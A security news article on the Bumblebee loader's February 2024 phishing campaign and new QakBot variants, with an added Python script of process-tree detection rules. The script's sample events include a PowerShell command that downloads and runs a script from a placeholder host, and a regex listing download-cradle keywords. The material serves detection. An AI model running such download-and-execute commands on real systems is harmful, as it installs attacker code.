Thursday, July 4, 2024

Bumblebee Malware Returns with New Tricks, Targeting U.S. Businesses

Feb 14, 2024 | Newsroom | Malware / Cybercrime


The notorious malware loader and initial access broker known as Bumblebee has resurfaced after a four-month absence as part of a new phishing campaign observed in February 2024.

Enterprise security firm Proofpoint said the activity targets organizations in the U.S. with voicemail-themed lures containing links to OneDrive URLs.

“The URLs led to a Word file with names such as "ReleaseEvans#96.docm" (the digits before the file extension varied),” the company said in a Tuesday report. “The Word document spoofed the consumer electronics company Humane.”

Opening the document leverages VBA macros to launch a PowerShell command that downloads and executes another PowerShell script from a remote server, which in turn retrieves and runs the Bumblebee loader.


Bumblebee, first spotted in March 2022, is mainly designed to download and execute follow-on payloads such as ransomware. It has been put to use by several crimeware threat actors that were previously observed delivering BazaLoader (aka BazarLoader) and IcedID.

It is also suspected to have been developed by threat actors from the Conti and TrickBot cybercrime syndicate as a replacement for BazarLoader. In September 2023, Intel 471 disclosed a Bumblebee distribution campaign that employed Web Distributed Authoring and Versioning (WebDAV) servers to disseminate the loader.

The attack chain is notable for its reliance on macro-enabled documents, particularly considering Microsoft began blocking macros by default in Office files downloaded from the internet starting July 2022, prompting threat actors to switch and diversify their approaches.

The macro-based attack is also markedly different from pre-hiatus campaigns in which the phishing emails came with zipped LNK files bearing Bumblebee executables or HTML attachments that leveraged HTML smuggling to drop a RAR file, which exploited the WinRAR flaw tracked as CVE-2023-38831 to install the loader.

The return of Bumblebee also coincides with the reappearance of new variants of QakBot, ZLoader, and PikaBot, with samples of QakBot distributed in the form of Microsoft Software Installer (MSI) files.

“The .MSI drops a Windows .cab (Cabinet) archive, which in turn contains a DLL,” cybersecurity firm Sophos said on Mastodon. “The .MSI extracts the DLL from the .cab, and executes it using shellcode. The shellcode causes the DLL to spawn a second copy of itself and inject the bot code into the second instance’s memory space.”
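As an added example (not code from Proofpoint, Sophos, or this article), the following Python script turns the two process chains described above, the Bumblebee macro-to-PowerShell download step and the QakBot MSI-to-DLL self-spawn step, into simple process-tree detection rules and runs them over a few constructed, Sysmon-style process-creation events. The event fields, image paths, file names, and command lines are assumptions made up for the illustration, not indicators from the article.

```python
"""Process-tree rules for the two delivery chains described in the article.

Added example, not Proofpoint's or Sophos's code. Two checks run over a small
set of constructed, Sysmon-style process-creation events:

  1. Bumblebee-style chain: an Office application spawns PowerShell whose
     command line carries a download-and-execute pattern (macro -> PowerShell
     -> remote script -> loader).
  2. QakBot-style MSI chain: msiexec.exe launches a DLL host, which then spawns
     a second copy of itself (the DLL -> second instance -> injection step).

Event fields, image paths and sample command lines are assumptions made up for
this illustration; they are not indicators taken from the article.
"""
import re
from typing import Dict, List, NamedTuple, Tuple


class ProcEvent(NamedTuple):
    pid: int
    ppid: int
    image: str      # full path of the created process
    cmdline: str    # its command line


OFFICE_APPS = {"winword.exe", "excel.exe", "powerpnt.exe"}
SHELLS = {"powershell.exe", "pwsh.exe"}
DLL_HOSTS = {"rundll32.exe", "regsvr32.exe"}

# Common PowerShell download-and-execute primitives, matched case-insensitively.
DOWNLOAD_CRADLE = re.compile(
    r"downloadstring|downloadfile|invoke-webrequest|\biwr\b|\birm\b"
    r"|invoke-expression|\biex\b|frombase64string",
    re.IGNORECASE,
)


def basename(image: str) -> str:
    """Lower-cased file name of a Windows image path."""
    return image.rsplit("\\", 1)[-1].lower()


def detect(events: List[ProcEvent]) -> List[Tuple[str, int]]:
    """Return (rule_name, pid) for every event that matches a rule."""
    by_pid: Dict[int, ProcEvent] = {e.pid: e for e in events}
    alerts: List[Tuple[str, int]] = []
    for ev in events:
        parent = by_pid.get(ev.ppid)
        if parent is None:
            continue  # no lineage available for this event
        name, pname = basename(ev.image), basename(parent.image)

        # Rule 1: Office -> PowerShell with a download cradle on the command line.
        if pname in OFFICE_APPS and name in SHELLS and DOWNLOAD_CRADLE.search(ev.cmdline):
            alerts.append(("office_powershell_cradle", ev.pid))

        # Rule 2: msiexec -> DLL host -> identical DLL host (self-spawn).
        if name in DLL_HOSTS and pname == name and ev.cmdline == parent.cmdline:
            grandparent = by_pid.get(parent.ppid)
            if grandparent is not None and basename(grandparent.image) == "msiexec.exe":
                alerts.append(("msi_dll_self_spawn", ev.pid))
    return alerts


# Constructed sample telemetry (all paths, names and hosts are made up).
SAMPLE_EVENTS = [
    ProcEvent(100, 1, r"C:\Windows\explorer.exe", "explorer.exe"),
    ProcEvent(200, 100, r"C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXE",
              r'"WINWORD.EXE" /n "C:\Users\alice\Downloads\ReleaseEvans#96.docm"'),
    ProcEvent(300, 200, r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
              "powershell.exe -w hidden -c \"IEX (New-Object Net.WebClient)"
              ".DownloadString('http://stage.invalid/next.ps1')\""),
    ProcEvent(400, 100, r"C:\Windows\System32\msiexec.exe",
              r'msiexec.exe /i "C:\Users\alice\Downloads\setup.msi" /qn'),
    ProcEvent(410, 400, r"C:\Windows\System32\rundll32.exe",
              r'rundll32.exe "C:\Users\alice\AppData\Local\Temp\pkg.dll",Start'),
    ProcEvent(420, 410, r"C:\Windows\System32\rundll32.exe",
              r'rundll32.exe "C:\Users\alice\AppData\Local\Temp\pkg.dll",Start'),
    # Benign control: Word launching its print helper with no download cradle.
    ProcEvent(500, 200, r"C:\Windows\splwow64.exe", "splwow64.exe"),
]

if __name__ == "__main__":
    for rule, pid in detect(SAMPLE_EVENTS):
        print(f"{rule}: pid {pid}")
```

Both rules key on parent-child lineage rather than on file names alone, which is why they survive the lure file being renamed or the DLL being dropped under a different path; in practice the Rule 1 pattern list would be tuned against the environment's own legitimate Office automation to keep false positives down.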

The latest QakBot artifacts have been found to harden the encryption used to conceal strings and other information, including the use of a crypter malware called DaveCrypter, making it more challenging to analyze. The new generation also reinstates the ability to detect whether the malware is running inside a virtual machine or sandbox.


Another crucial modification includes encrypting all communications between the malware and the command-and-control (C2) server using AES-256, a stronger method than was used in versions prior to the dismantling of QakBot's infrastructure in late August 2023.

“The takedown of the QakBot botnet infrastructure was a victory, but the bot’s creators remain free, and someone who has access to QakBot’s original source code has been experimenting with new builds and testing the waters with these latest variants,” Andrew Brandt, principal researcher at Sophos X-Ops, said.

“Some of the most notable changes involve a change to the encryption algorithm the bot uses to conceal default configurations hardcoded into the bot, making it harder for analysts to see how the malware operates; the attackers are also restoring previously deprecated features, such as virtual machine (VM) awareness, and testing them out in these new versions.”

QakBot has also emerged as the second most prevalent malware for January 2024, trailing behind FakeUpdates (aka SocGholish) but ahead of other families like Formbook, Nanocore, AsyncRAT, Remcos RAT, and Agent Tesla.

The development comes as Malwarebytes revealed a new campaign in which phishing sites mimicking financial institutions like Barclays trick potential targets into downloading legitimate remote desktop software like AnyDesk to purportedly resolve non-existent issues and ultimately allow threat actors to gain control of the machine.
